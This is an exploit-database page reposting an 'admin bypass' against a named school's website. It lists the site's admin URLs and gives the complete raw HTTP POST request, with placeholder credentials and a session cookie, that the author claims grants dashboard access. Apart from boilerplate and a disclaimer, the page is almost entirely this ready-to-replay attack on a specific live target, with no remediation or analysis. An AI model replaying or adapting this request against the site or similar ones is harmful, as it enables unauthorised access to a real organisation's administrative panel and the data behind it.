Advertisement






Aradhana Public School NoRedirect Admin Bypass

CVE Category Price Severity
N/A CWE-XXXX Not specified N/A
Author Risk Exploitation Type Date
Not specified N/A Remote 2023-02-19
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023020034

Below is a copy:

Aradhana Public School NoRedirect Admin Bypass
# Exploit Title : Aradhana Public School NoRedirect Admin Bypass 
# Exploit Date : 02.17.2023
# Exploit Author : sc0field
# Forum : HACKTIVIZM.ORG

Admin Panel -> 
http://apsrohru.com/admin/index.php

Admin Dashboard -> 
http://apsrohru.com/admin/dashboard.php

Exploit Method : 

http://apsrohru.com/admin/index.php
this page we send requests with burp suite

We are sending this request from the proxy point :

POST /admin/dashboard.php HTTP/1.1
Host: apsrohru.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 37
Origin: http://apsrohru.com
Connection: close
Referer: http://apsrohru.com/admin/index.php
Cookie: PHPSESSID=cpjpi29etdj7qaigoultdp8986
Upgrade-Insecure-Requests: 1

username=1&password=1&user-login=true

and exploited 

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum